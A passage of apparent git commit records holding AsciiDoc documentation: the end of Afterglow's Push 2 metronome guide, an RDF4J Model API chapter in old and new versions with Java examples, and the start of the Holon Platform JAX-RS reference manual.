changes\nvalue, while the BPM encoder turns smoothly as you scroll through\nfractional BPM values.\n\nWhile the metronome section is showing, you can also use the encoder\nabove the Beat value to adjust it. But you can grab the dedicated Beat\nencoder above the kbd:[Tap Tempo] button even when the metronome\nsection is not showing, and it will appear while you have the encoder\nin your hand, so you can adjust the beat number quickly, and then get\nback to what you were doing.\n\nIf you press the kbd:[Shift] button, the Beat encoder can be used to\nadjust the current bar within the phrase instead of the current beat.\nWhile kbd:[Shift] is down, the bar will be brightened instead of the\nbeat, and turning the encoder will jump that value forwards or\nbackwards:\n\nimage::beat-adjustment.gif[Beat adjustment animation]\n\nIf you know a phrase is about to begin, you can press the red\nkbd:[Reset] button in the metronome section right as it does. This\nwill reset the count to Phrase 1, Bar 1, Beat 1.\n\nTrying to keep up with tempo changes during dynamic shows can be\ntedious, so you will hopefully be able to take advantage of\nAfterglow's metronome synchronization features. If the DJ can send you\n<<mapping_sync#syncing-to-midi-clock,MIDI clock pulses>>, or you can\nconnect via a Local Area Network to Pioneer professional DJ gear to\nlock into the beat grid established by\n<<mapping_sync#syncing-to-pro-dj-link,Pro DJ Link>>, Afterglow can\nkeep the BPM (with MIDI) and even the beats (with Pro DJ Link and the\nTraktor Afterglow Beat Phase\n<<mapping_sync#syncing-to-traktor-beat-phase,controller mapping>>)\nsynchronized for you. 
The Sync button in the Metronome section\n(showing kbd:[Manual] sync in these photos) will eventually allow you to\nset this up, but that is not yet implemented, so for now you will need\nto use the <<README#metronome-control,web interface>> to configure it.\n\nNOTE: The button does already change color to let you know the sync\nstatus: amber means manual, green means successful automatic sync, and\nred means a requested automatic sync has failed. It is likely that a\nfuture release of Afterglow will let you press this button to choose\nyour sync source.\n\nOnce your sync is established, the meaning of the kbd:[Tap Tempo]\nbutton changes. If you are using MIDI clock to sync the BPM, it\nbecomes a kbd:[Tap Beat] button, which simply establishes where the\nbeat falls. If you are locked in to a Pro DJ Link beat grid or using\nthe Traktor beat phase mapping, the beats are automatically aligned\nfor you so, it becomes a kbd:[Tap Bar] button which, when pressed,\nindicates that the current beat is the down beat (start) of a bar.\n(Similarly, if you press the metronome kbd:[Reset] pad while synced to\na Pro DJ Link beat grid or Traktor beat phase, the beat itself will\nnot move, but the beat closest to when you pressed the pad will be\nidentified as Beat 1.) In these sync modes you can also use the\nkbd:[Shift] button to align at the next bigger boundary: If tapping\nwould normally move the bar, shift-tapping will move the phrase.\n\nIf you try to adjust the BPM encoder while sync is active, it will\nhave no effect, and Afterglow will point at the sync mode to explain\nwhy it is ignoring your adjustments.\n\n=== Sharing the Push 2\n\nIf you are using Afterglow at the same time as Ableton Live, you can\nswitch back and forth between which has control of the Push by\npressing the kbd:[User] button. If Live is not running when you press\nkbd:[User], the Push interface will simply go blank (except for the\nkbd:[User] button itself), until you press it again, at which point\nAfterglow will light it up.\n\nNOTE: Future releases will take advantage of more of the buttons on\nthe controller.\n\n==== License\n\n+++<a href=\"http:\/\/deepsymmetry.org\"><img src=\"assets\/DS-logo-bw-200-padded-left.png\" align=\"right\" alt=\"Deep Symmetry logo\"><\/a>+++\nCopyright \u00a9 2015-2018 http:\/\/deepsymmetry.org[Deep Symmetry, LLC]\n\nDistributed under the\nhttp:\/\/opensource.org\/licenses\/eclipse-1.0.php[Eclipse Public License\n1.0], the same as Clojure. By using this software in any fashion, you\nare agreeing to be bound by the terms of this license. You must not\nremove this notice, or any other, from this software. A copy of the\nlicense can be found in\nhttps:\/\/deepsymmetry.org\/afterglow\/resources\/public\/epl-v10.html[resources\/public\/epl-v10.html]\nwithin this project.\n","returncode":0,"stderr":"","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"7be74e3c2d911ce8738eb646568b4c3cead7eee5","subject":"Fix typo {javdoc} to {javadoc}","message":"Fix typo {javdoc} to {javadoc}","repos":"eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j,eclipse\/rdf4j","old_file":"doc\/programming\/02-model-api.adoc","new_file":"doc\/programming\/02-model-api.adoc","new_contents":"= The RDF Model API\n\nThe RDF Model API is the core of the RDF4J framework. It provides the basic building blocks for manipulating RDF data in Java. 
In this chapter, we introduce these basic building blocks and show some examples of how to use them.\n\n== RDF Building Blocks: IRIs, literals, blank nodes and statements\n\nThe core of the RDF4J framework is the RDF Model API (see the link:\/javadoc\/latest\/?org\/eclipse\/rdf4j\/model\/package-summary.html[Model API Javadoc]), defined in package `org.eclipse.rdf4j.model`. This API defines how the building blocks of RDF (statements, IRIs, blank nodes, literals, and models) are represented.\n\nRDF statements are represented by the {javadoc}model\/Statement.html[Statement] interface. Each `Statement` has a subject, predicate, object and (optionally) a context (more about contexts below, in the section about the Repository API). Each of these 4 items is a {javadoc}model\/Value.html[Value]. The `Value` interface is further specialized into {javadoc}model\/Resource.html[Resource], and {javadoc}model\/Literal.html[Literal]. `Resource` represents any RDF value that is either a blank node or an IRI (in fact, it specializes further into {javadoc}model\/IRI.html[IRI] and {javadoc}model\/BNode.html[BNode]). `Literal`\nrepresents RDF literal values (strings, dates, integer numbers, and so on).\n\nTo create new values and statements, we can use a {javadoc}model\/ValueFactory.html[ValueFactory]. You can use a default ValueFactory implementation called {javadoc}model\/impl\/SimpleValueFactory.html[SimpleValueFactory]:\n\n[source,java]\n----\nimport org.eclipse.rdf4j.model.ValueFactory;\nimport org.eclipse.rdf4j.model.impl.SimpleValueFactory;\n\nValueFactory factory = SimpleValueFactory.getInstance();\n----\n\nYou can also obtain a `ValueFactory` from the {javadoc}repository\/Repository.html[Repository] you are working with, and in fact, this is the recommended approach. More about that in the next section.\n\nRegardless of how you obtain your `ValueFactory`, once you have it, you can use it to create new IRIs, Literals, and Statements:\n\n[source,java]\n----\nIRI bob = factory.createIRI(\"http:\/\/example.org\/bob\");\nIRI name = factory.createIRI(\"http:\/\/example.org\/name\");\nLiteral bobsName = factory.createLiteral(\"Bob\");\nStatement nameStatement = factory.createStatement(bob, name, bobsName);\n----\n\nThe Model API also provides pre-defined IRIs for several well-known vocabularies, such as RDF, RDFS, OWL, DC (Dublin Core), FOAF (Friend-of-a-Friend), and more. These constants can all be found in the {javadoc}model\/vocabulary\/package-summary.html[org.eclipse.rdf4j.model.vocabulary] package, and can be quite handy in quick creation of RDF statements (or in querying a Repository, as we shall see later):\n\n[source,java]\n----\nStatement typeStatement = factory.createStatement(bob, RDF.TYPE, FOAF.PERSON);\n----\n\n== The Model interface\n\nThe above interfaces and classes show how we can create the individual building blocks that make up an RDF model. However, an actual collection of RDF data is just that: a collection. In order to deal with collections of RDF statements, we can use the {javadoc}model\/Model.html[org.eclipse.rdf4j.model.Model] interface.\n\n`Model` is an extension of the default Java Collection class `java.util.Set<Statement>`. 
This means that you can use a `Model` like any other Java collection in your code: \n\n[source,java]\n----\n\/\/ create a new Model to put statements in\nModel model = new LinkedHashModel(); \n\/\/ add an RDF statement\nmodel.add(typeStatement);\n\/\/ add another RDF statement by simply providing subject, predicate, and object.\nmodel.add(bob, name, bobsName);\n \n\/\/ iterate over every statement in the Model\nfor (Statement statement: model) {\n\t ...\n}\n----\n\nIn addition, however, `Model` offers a number of useful methods to quickly get subsets of statements and otherwise search\/filter your collection of statements. For example, to quickly iterate over all statements that make a resource an instance of the class `foaf:Person`, you can do:\n\n[source,java]\n----\nfor (Statement typeStatement: model.filter(null, RDF.TYPE, FOAF.PERSON)) {\n \/\/ ...\n}\n----\n\nEven more convenient is that you can quickly retrieve the building blocks that make up the statements. For example, to immediately iterate over all subject-resources that are of type `foaf:Person` and then retrieve each person\u2019s name, you can do something like the following:\n\n[source,java]\n----\nfor (Resource person: model.filter(null, RDF.TYPE, FOAF.PERSON).subjects()) {\n \/\/ get the name of the person (if it exists)\n Optional<Literal> name = Models.objectLiteral(model.filter(person, FOAF.NAME, null)); \n}\n----\n\nThe `filter()` method returns a `Model` again. However, the `Model` returned by this method is still backed by the original `Model`. Thus, changes that you make to this returned `Model` will automatically be reflected in the original `Model` as well.\n\nRDF4J provides two default implementations of the `Model` interface: {javadoc}model\/impl\/LinkedHashModel.html[org.eclipse.rdf4j.model.impl.LinkedHashModel], and {javadoc}model\/impl\/TreeModel.html[org.eclipse.rdf4j.model.impl.TreeModel]. The difference between the two is in their performance for different kinds of lookups and insertion patterns (see their respective javadoc entries for details). These differences are only really noticeable when dealing with quite large collections of statements, however. \n\n== Building RDF Models with the ModelBuilder\n\nSince version 2.1, RDF4J provides a {javadoc}model\/util\/ModelBuilder.html[ModelBuilder] utility. 
The ModelBuilder provides a fluent API to quickly and efficiently create RDF models programmatically.\n\nHere\u2019s a simple code example that demonstrates how to quickly create an RDF graph with some FOAF data:\n\n[source,java]\n----\nModelBuilder builder = new ModelBuilder();\n \n\/\/ set some namespaces \nbuilder.setNamespace(\"ex\", \"http:\/\/example.org\/\").setNamespace(FOAF.NS);\n\nbuilder.namedGraph(\"ex:graph1\") \/\/ add a new named graph to the model\n .subject(\"ex:john\") \/\/ add several statements about resource ex:john \n\t .add(FOAF.NAME, \"John\") \/\/ add the triple (ex:john, foaf:name \"John\") to the named graph\n\t .add(FOAF.AGE, 42)\n\t .add(FOAF.MBOX, \"john@example.org\");\n\n\/\/ add a triple to the default graph\nbuilder.defaultGraph().add(\"ex:graph1\", RDF.TYPE, \"ex:Graph\");\n\n\/\/ return the Model object\nModel m = builder.build();\n----\n\nThe ModelBuilder offers several conveniences:\n\n - you can specify a subject\/predicate IRI as a prefixed name string (for example \u201cex:john\u201d), so you don\u2019t have to use a ValueFactory to create an IRI object first.\n - you can add a literal object as a String, an int, or several other supported Java primitive types.\n - the subject() method makes it easier to take a resource-centric view when building an RDF Model.\n\n== RDF Collections\n\nTo model closed lists of items, RDF provides a Collection vocabulary. RDF Collections are represented as a list of items using a Lisp-like structure. The list starts with a head resource (typically a blank node), which is connected to the first collection member via the rdf:first relation. The head resource is then connected to the rest of the list via an rdf:rest relation. The last resource in the list is marked using the rdf:nil node.\n\nAs an example, a list containing three values, \u201cA\u201d, \u201cB\u201d, and \u201cC\u201d looks like this as an RDF Collection:\n\n[[img-collection]]\nimage::rdf-collection.svg[title=\"An RDF Collection containing three items\"]\n\nHere, the blank node `_:n1` is the head resource of the list. In this example it is declared an instance of rdf:List, however this is not required for the collection to be considered well-formed. For each collection member, a new node is added (linked to the previous node via the `rdf:rest` property), and the actual member value is linked to this node via the `rdf:first` property. The last member of the list is marked by the fact that the value of its `rdf:rest` property is set to `rdf:nil`.\n\nWorking with this kind of structure directly is rather cumbersome. 
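For instance, building the three-item list above by hand means writing every rdf:first and rdf:rest link yourself. A minimal sketch of that (assuming the `RDF` vocabulary constants and the `SimpleValueFactory` shown earlier) might look like this:\n\n[source,java]\n----\n\/\/ RDF.FIRST, RDF.REST and RDF.NIL come from org.eclipse.rdf4j.model.vocabulary.RDF\nValueFactory vf = SimpleValueFactory.getInstance();\n\/\/ one blank node per member; the first one acts as the head of the list\nResource n1 = vf.createBNode();\nResource n2 = vf.createBNode();\nResource n3 = vf.createBNode();\nModel list = new LinkedHashModel();\n\/\/ each node carries its member value via rdf:first...\nlist.add(n1, RDF.FIRST, vf.createLiteral(\"A\"));\nlist.add(n2, RDF.FIRST, vf.createLiteral(\"B\"));\nlist.add(n3, RDF.FIRST, vf.createLiteral(\"C\"));\n\/\/ ...and points to the next node via rdf:rest, ending with rdf:nil\nlist.add(n1, RDF.REST, n2);\nlist.add(n2, RDF.REST, n3);\nlist.add(n3, RDF.REST, RDF.NIL);\n----\n\n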
To make life a little easier, the RDF4J API provides several utilities to convert between Java Collections and RDF Collections.\n\n=== Converting to\/from Java Collections\n\nAs an example, suppose we wish to add the above list of three string literals as a property value for the property `ex:favoriteLetters` of `ex:John`.\n\nThe {javadoc}model\/util\/RDFCollections.html[RDFCollections] utility allows us to do this, as follows:\n\n[source,java]\n----\nString ns = \"http:\/\/example.org\/\";\nValueFactory vf = SimpleValueFactory.getInstance(); \n\/\/ IRI for ex:favoriteLetters \nIRI favoriteLetters = vf.createIRI(ns, \"favoriteLetters\"); \n\/\/ IRI for ex:John \nIRI john = vf.createIRI(ns, \"John\"); \n\/\/ create a list of letters \nList<Literal> letters = Arrays.asList(new Literal[] { vf.createLiteral(\"A\"), vf.createLiteral(\"B\"), vf.createLiteral(\"C\") }); \n\/\/ create a head resource for our list \nResource head = vf.createBNode(); \n\/\/ convert our list and add it to a newly-created Model \nModel aboutJohn = RDFCollections.asRDF(letters, head, new LinkedHashModel()); \n\/\/ set the ex:favoriteLetters property to link to the head of the list\naboutJohn.add(john, favoriteLetters, head);\n----\n\nOf course, we can also convert back:\n\n[source,java]\n----\nModel aboutJohn = ... ; \/\/ our Model about John\n\/\/ get the value of the ex:favoriteLetters property \nResource node = Models.objectResource(aboutJohn.filter(john, favoriteLetters, null)).orElse(null); \n\/\/ Convert its collection back to an ArrayList of values\nif(node != null) { \n\t List<Value> values = RDFCollections.asValues(aboutJohn, node, new ArrayList<Value>()); \n\t \/\/ you may need to cast back to Literal. \n\t Literal a = (Literal)values.get(0); \n}\n----\n\n=== Extracting, copying, or deleting an RDF Collection\n\nTo extract an RDF Collection from the model which contains it, we can do the following:\n\n[source,java]\n----\nModel aboutJohn = ...; \/\/ our model\n\/\/ get the value of the ex:favoriteLetters property \nResource node = Models.objectResource(aboutJohn.filter(john, favoriteLetters, null)).orElse(null); \n\/\/ get the RDF Collection in a separate model\nif (node != null) { \n\t Model rdfList = RDFCollections.getCollection(aboutJohn, node, new LinkedHashModel()); \n}\n----\n\nAs you can see, instead of converting the RDF Collection to a Java List of values, we get back another Model object from this, containing a copy of the RDF statements that together form the RDF Collection. This is useful in cases where your original Model contains more data than just the RDF Collection, and you want to isolate the collection.\n\nOnce you have this copy of your Collection, you can add it somewhere else, or use it to remove the collection from your Model:\n\n[source,java]\n----\n\/\/ remove the collection from our model about John \naboutJohn.removeAll(rdfList); \n\/\/ finally remove the triple that linked John to the collection \naboutJohn.remove(john, favoriteLetters, node);\n----\n\nActually, deleting can be done more efficiently than this. 
Rather than first creating a completely new copy of the RDF Collection only to then delete it, we can use a streaming approach instead:\n\n[source,java]\n----\n\/\/ extract the collection from our model in streaming fashion and remove each statement from the model \nRDFCollections.extract(aboutJohn, node, st -> aboutJohn.remove(st)); \n\/\/ remove the statement that linked john to the collection \naboutJohn.remove(john, favoriteLetters, node);\n----\n","old_contents":"= The RDF Model API\n\nThe RDF Model API is the core of the RDF4J framework. It provides the basic building blocks for manipulating RDF data in Java. In this chapter, we introduce these basic building blocks and show some example on hot to use them.\n\n== RDF Building Blocks: IRIs, literals, blank nodes and statements\n\nThe core of the RDF4J framework is the RDF Model API (see the link:\/javadoc\/latest\/?org\/eclipse\/rdf4j\/model\/package-summary.html[Model API Javadoc]), defined in package `org.eclipse.rdf4j.model`. This API defines how the building blocks of RDF (statements, IRIs, blank nodes, literals, and models) are represented.\n\nRDF statements are represented by the {javadoc}model\/Statement.html[Statement] interface. Each `Statement` has a subject, predicate, object and (optionally) a context (more about contexts below, in the section about the Repository API). Each of these 4 items is a {javadoc}model\/Value.html[Value]. The `Value` interface is further specialized into {javadoc}model\/Resource.html[Resource], and {javadoc}model\/Literal.html.html[Literal]. `Resource` represents any RDF value that is either a blank node or a IRI (in fact, it specializes further into {javadoc}model\/IRI.html[IRI] and {javadoc}model\/BNode.html[BNode]). `Literal`\nrepresents RDF literal values (strings, dates, integer numbers, and so on).\n\nTo create new values and statements, we can use a {javadoc}model\/ValueFactory.html[ValueFactory]. You can use a default ValueFactory implementation called {javadoc}model\/impl\/SimpleValueFactory[SimpleValueFactory]:\n\n[source,java]\n----\nimport org.eclipse.rdf4j.model.ValueFactory;\nimport org.eclipse.rdf4j.model.impl.SimpleValueFactory;\n\nValueFactory factory = SimpleValueFactory.getInstance();\n----\n\nYou can also obtain a `ValueFactory` from the {javadoc}repository\/Repository.html[Repository] you are working with, and in fact, this is the recommend approach. More about that in the next section.\n\nRegardless of how you obtain your `ValueFactory`, once you have it, you can use it to create new URIs, Literals, and Statements:\n\n[source,java]\n----\nIRI bob = factory.createIRI(\"http:\/\/example.org\/bob\");\nIRI name = factory.createIRI(\"http:\/\/example.org\/name\");\nLiteral bobsName = factory.createLiteral(\"Bob\");\nStatement nameStatement = factory.createStatement(bob, name, bobsName);\n----\n\nThe Model API also provides pre-defined IRIs for several well-known vocabularies, such as RDF, RDFS, OWL, DC (Dublin Core), FOAF (Friend-of-a-Friend), and more. These constants can all be found in the {javadoc}model\/vocabulary\/package-summary.html[org.eclipse.rdf4j.model.vocabulary] package, and can be quite handy in quick creation of RDF statements (or in querying a Repository, as we shall see later):\n\n[source,java]\n----\nStatement typeStatement = factory.createStatement(bob, RDF.TYPE, FOAF.PERSON);\n----\n\n== The Model interface\n\nThe above interfaces and classes show how we can create the individual building blocks that make up an RDF model. 
However, an actual collection of RDF data is just that: a collection. In order to deal with collections of RDF statements, we can use the {javadoc}model\/Model[org.eclipse.rdf4j.model.Model] interface.\n\n`Model` is an extension of the default Java Collection class `java.util.Set<Statement>`. This means that you can use a `Model` like any other Java collection in your code: \n\n[source,java]\n----\n\/\/ create a new Model to put statements in\nModel model = new LinkedHashModel(); \n\/\/ add an RDF statement\nmodel.add(typeStatement);\n\/\/ add another RDF statement by simply providing subject, predicate, and object.\nmodel.add(bob, name, bobsName);\n \n\/\/ iterate over every statement in the Model\nfor (Statement statement: model) {\n\t ...\n}\n----\n\nIn addition, however, `Model` offers a number of useful methods to quickly get subsets of statements and otherwise search\/filter your collection of statements. For example, to quickly iterate over all statements that make a resource an instance of the class `foaf:Person`, you can do:\n\n[source,java]\n----\nfor (Statement typeStatement: model.filter(null, RDF.TYPE, FOAF.PERSON)) {\n \/\/ ...\n}\n----\n\nEven more convenient is that you can quickly retrieve the building blocks that make up the statements. For example, to immediately iterate over all subject-resources that are of type `foaf:Person` and then retrieve each person\u2019s name, you can do something like the following:\n\n[source,java]\n----\nfor (Resource person: model.filter(null, RDF.TYPE, FOAF.PERSON).subjects()) {\n \/\/ get the name of the person (if it exists)\n Optional<Literal> name = Models.objectLiteral(model.filter(person, FOAF.NAME, null)); \n}\n----\n\nThe `filter()` method returns a `Model` again. However, the `Model` returned by this method is still backed by the original `Model`. Thus, changes that you make to this returned `Model` will automatically be reflected in the original `Model` as well.\n\nRDF4J provides two default implementations of the `Model` interface: {javdoc}model\/impl\/LinkedHashModel.html[org.eclipse.rdf4j.model.impl.LinkedHashModel], and {javadoc}model\/impl\/TreeModel.html[org.eclipse.rdf4j.model.impl.TreeModel]. The difference between the two is in their performance for different kinds of lookups and insertion patterns (see their respective javadoc entries for details). These differences are only really noticable when dealing with quite large collections of statements, however. \n\n== Building RDF Models with the ModelBuilder\n\nSince version 2.1, RDF4J provides a {javadoc}model\/util\/ModelBuiler.html[ModelBuilder] utility. 
The ModelBuilder provides a fluent API to quickly and efficiently create RDF models programmatically.\n\nHere\u2019s a simple code example that demonstrates how to quickly create an RDF graph with some FOAF data:\n\n[source,java]\n----\nModelBuilder builder = new ModelBuilder();\n \n\/\/ set some namespaces \nbuilder.setNamespace(\"ex\", \"http:\/\/example.org\/\").setNamespace(FOAF.NS);\n\nbuilder.namedGraph(\"ex:graph1\") \/\/ add a new named graph to the model\n .subject(\"ex:john\") \/\/ add several statements about resource ex:john \n\t .add(FOAF.NAME, \"John\") \/\/ add the triple (ex:john, foaf:name \"John\") to the named graph\n\t .add(FOAF.AGE, 42)\n\t .add(FOAF.MBOX, \"john@example.org\");\n\n\/\/ add a triple to the default graph\nbuilder.defaultGraph().add(\"ex:graph1\", RDF.TYPE, \"ex:Graph\");\n\n\/\/ return the Model object\nModel m = builder.build();\n----\n\nThe ModelBuilder offers several conveniences:\n\n - you can specify a subject\/predicate IRI as a prefixed name string (for example \u201cex:john\u201d), so you don\u2019t have to use a ValueFactory to create an IRI object first.\n - you can add a literal object as a String, an int, or several other supported Java primitive types.\n - the subject() method make it easier to take a resource-centric view when building an RDF Model.\n\n== RDF Collections\n\nTo model closed lists of items, RDF provides a Collection vocabulary . RDF Collections are represented as a list of items using a Lisp-like structure. The list starts with a head resource (typically a blank node), which is connected to the first collection member via the rdf:first relation. The head resource is then connected to the rest of the list via an rdf:rest relation. The last resource in the list is marked using the rdf:nil node.\n\nAs an example, a list containing three values, \u201cA\u201d, \u201cB\u201d, and \u201cC\u201d looks like this as an RDF Collection:\n\n[[img-collection]]\nimage::rdf-collection.svg[title=\"An RDF Collection containing three items\"]\n\nHere, the blank node `_:n1` is the head resource of the list. In this example it is declared an instance of rdf:List, however this is not required for the collection to be considered well-formed. For each collection member, a new node is added (linked to the previous node via the `rdf:rest` property), and the actual member value is linked to to this node via the `rdf:first` property. The last member member of the list is marked by the fact that the value of its `rdf:rest` property is set to `rdf:ni`l.\n\nWorking with this kind of structure directly is rather cumbersome. 
To make life a little easier, the RDF4J API provide several utilities to convert between Java Collections and RDF Collections.\n\n=== Converting to\/from Java Collections\n\nAs an example, suppose we wish to add the above list of three string literals as a property value for the property `ex:favoriteLetters` of `ex:John` .\n\nThe {javadoc}model\/util\/RDFCollections.html[RDFCollections] utility allows us to do this, as follows:\n\n[source,java]\n----\nString ns = \"http:\/\/example.org\/\";\nValueFactory vf = SimpleValueFactory.getInstance(); \n\/\/ IRI for ex:favoriteLetters \nIRI favoriteLetters = vf.createIRI(ns, \"favoriteLetters\"); \n\/\/ IRI for ex:John \nIRI john = vf.createIRI(ns, \"John\"); \n\/\/ create a list of letters \nList<Literal> letters = Arrays.asList(new Literal[] { vf.createLiteral(\"A\"), vf.createLiteral(\"B\"), vf.createLiteral(\"C\") }); \n\/\/ create a head resource for our list \nResource head = vf.createBNode(); \n\/\/ convert our list and add it to a newly-created Model \nModel aboutJohn = RDFCollections.asRDF(letters, head, new LinkedHashModel()); \n\/\/ set the ex:favoriteLetters property to link to the head of the list\naboutJohn.add(john, favoriteLetters, head);\n----\n\nOf course, we can also convert back:\n\n[source,java]\n----\nModel aboutJohn = ... ; \/\/ our Model about John\n\/\/ get the value of the ex:favoriteLetters property \nResource node = Models.objectResource(aboutJohn.filter(john, favoriteLetters, null)).orElse(null); \n\/\/ Convert its collection back to an ArrayList of values\nif(node != null) { \n\t List<Value> values = RDFCollections.asValues(aboutJohn, node, new ArrayList<Value>()); \n\t \/\/ you may need to cast back to Literal. \n\t Literal a = (Literal)values.get(0); \n}\n----\n\n=== Extracting, copying, or deleting an RDF Collection\n\nTo extract an RDF Collection from the model which contains it, we can do the following:\n\n[source,java]\n----\nModel aboutJohn = ...; \/\/ our model\n\/\/ get the value of the ex:favoriteLetters property \nResource node = Models.objectResource(aboutJohn.filter(john, favoriteLetters, null)).orElse(null); \n\/\/ get the RDF Collection in a separate model\nif (node != null) { \n\t Model rdfList = RDFCollections.getCollection(aboutJohn, node, new LinkedHashModel()); \n}\n----\n\nAs you can see, instead of converting the RDF Collection to a Java List of values, we get back another Model object from this, containing a copy of the RDF statements that together form the RDF Collection. This is useful in cases where your original Model contains more data than just the RDF Collection, and you want to isolate the collection.\n\nOnce you have this copy of your Collection, you can use it to add it somewhere else, or to remove the collection from your Model:\n\n[source,java]\n----\n\/\/ remove the collection from our model about John \naboutJohn.removeAll(rdfList); \n\/\/ finally remove the triple that linked John to the collection \naboutJohn.remove(john, favoriteLetters, node);\n----\n\nActually, deleting can be done more efficiently than this. 
Rather than first creating a completely new copy of the RDF Collection only to then delete it, we can use a streaming approach instead:\n\n[source,java]\n----\n\/\/ extract the collection from our model in streaming fashion and remove each statement from the model \nRDFCollections.extract(aboutJohn, node, st -> aboutJohn.remove(st)); \n\/\/ remove the statement that linked john to the collection \naboutJohn.remove(john, favoriteLetters, node);\n----\n","returncode":0,"stderr":"","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8bb9d1571984c399d9ad257cf72bf724584c28ad","subject":"5.1.0 documentation updates","message":"5.1.0 documentation updates","repos":"holon-platform\/holon-jaxrs","old_file":"documentation\/src\/docs\/asciidoc\/reference\/holon-jaxrs.adoc","new_file":"documentation\/src\/docs\/asciidoc\/reference\/holon-jaxrs.adoc","new_contents":"= Holon Platform JAX-RS Module - Reference manual\n:description: Holon platform JAX-RS module reference documentation. \\\nIt concerns the platform JAX-RS and REST services support, including authentication and authorization, JWT support, Jersey and Resteasy integration, Swagger OpenAPI support, Spring framework integration and Spring Boot auto-configuration.\n:revnumber: {project-version}\n:apidir: ..\/api\/holon-jax-rs\n:coreapidir: ..\/api\/holon-core\n:linkattrs:\n:sectnums:\n:nofooter:\n:toc: left\n:toclevels: 3\n\nCopyright \u00a9 2016-2018\n\n_Copies of this document may be made for your own use and for distribution to others, provided that you do not charge any fee for such copies and further provided that each copy contains this Copyright Notice, whether distributed in print or electronically._\n\n== Introduction\n\nThe Holon Platform *JAX-RS* module provides support, components and configuration helpers concerning the link:https:\/\/github.com\/jax-rs\/spec\/blob\/master\/spec.pdf[JAX-RS^] - _Java API for RESTful Web Services_.\n\nThe module provides *JAX-RS* implementations and integrations for platform foundation components and structures, such as the link:holon-core.html#RestClient[RestClient] API, server-side authentication and authorization using a link:holon-core.html#Realm[Realm] and a complete link:http:\/\/swagger.io[Swagger^] _OpenAPI_ support for data containers such as link:holon-core.html#PropertyBox[PropertyBox].\n\nRegarding the *JSON* data-interchange format, this module uses the link:holon-json.html[Holon JSON module] to make available the Holon platform JSON extensions and configuration facilities for JAX-RS endpoints and clients, allowing to seamlessly use link:https:\/\/github.com\/FasterXML\/jackson[Jackson^] or link:https:\/\/github.com\/google\/gson[Gson^] as JSON providers and provide support for _temporal_ types (including the `java.time.*` API) and the `PropertyBox` type out-of-the-box. \n\nThe module provides full support for link:http:\/\/swagger.io[Swagger^] and the *OpenAPI specification* including support for the `PropertyBox` type (to be exposed as a Swagger _Model_ definition) and for Swagger API listing endpoints (both in _JSON_ and _YAML_ formats) auto-configuration. 
\n\nFurthermore, the module makes available a set of *auto-configuration* features, both for the JAX-RS ecosystem and for the link:https:\/\/spring.io[Spring^] and link:https:\/\/projects.spring.io\/spring-boot[Spring Boot^] world.\n\nComplete support for the most used JAX-RS implementations (link:https:\/\/github.com\/jersey[Jersey^] and link:http:\/\/resteasy.jboss.org[Resteasy^]) is provided, including Resteasy auto-configuration classes for Spring Boot integration.\n\n=== Sources and contributions\n\nThe Holon Platform *JAX-RS* module source code is available from the GitHub repository link:https:\/\/github.com\/holon-platform\/holon-jaxrs[https:\/\/github.com\/holon-platform\/holon-jaxrs^].\n\nSee the repository `README` file for information about:\n\n* The source code structure.\n* How to build the module artifacts from sources.\n* Where to find the code examples.\n* How to contribute to the module development.\n\n== Obtaining the artifacts\n\nThe Holon Platform uses https:\/\/maven.apache.org[Maven^] for project build and configuration. All the platform artifacts are published in the *Maven Central Repository*, so there is no need to explicitly declare additional repositories in your project `pom` file.\n\nAt the top of each _section_ of this documentation you will find the Maven _coordinates_ (group id, artifact id and version) to obtain the artifact(s) as a dependency for your project.\n\nA *BOM (Bill Of Materials)* `pom` is provided to import the available dependencies for a specific version in your projects. The Maven coordinates for the module BOM are the following:\n\n_Maven coordinates_:\n[source, xml, subs=\"attributes+\"]\n----\n<groupId>com.holon-platform.jaxrs<\/groupId>\n<artifactId>holon-jaxrs-bom<\/artifactId>\n<version>{revnumber}<\/version>\n----\n\nThe BOM can be imported in a Maven project in the following way:\n\n[source, xml, subs=\"verbatim,quotes,attributes+\"]\n----\n<dependencyManagement>\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>com.holon-platform.jaxrs<\/groupId>\n\t\t\t<artifactId>holon-jaxrs-bom<\/artifactId>\n\t\t\t<version>{revnumber}<\/version>\n\t\t\t*<type>pom<\/type>*\n\t\t\t*<scope>import<\/scope>*\n\t\t<\/dependency>\n\t<\/dependencies>\n<\/dependencyManagement>\n----\n\n=== Using the Platform BOM\n\nThe Holon Platform provides an *overall Maven BOM (Bill of Materials)* to easily obtain all the available platform artifacts.\n\nSee link:index.html#obtain-the-platform-artifacts[Obtain the platform artifacts] for details.\n\n[[WhatsNew51x]]\n== What's new in version 5.1.x\n\n* Improved support for the `java.time.*` Date and Time API data types when a `PropertyBox` type is serialized and deserialized as *JSON* in JAX-RS endpoints. See <<JSONMediaTypePropertyBox>>.\n\n* The new `JaxrsAuthenticationInspector` API is available in JAX-RS endpoints to inspect current `Authentication` and perform authorization controls using a JAX-RS `SecurityContext`. See <<JaxrsAuthenticationInspector>>.\n\n* Added support for *Spring Security* based authentication, providing features to integrate the `@Authenticate` annotation based authentication behaviour and using the Spring Security context as authentication handler. See <<JaxrsSpringSecurity>>.\n\n* Improved *Spring Boot* auto-configuration support for _Jersey_ and _Resteasy_ JAX-RS implementations. See <<JaxrsSpringBoot>>.\n\n* Improved link:https:\/\/swagger.io[Swagger^] integration and auto-configuration, using Spring Boot application properties for easier configuration. 
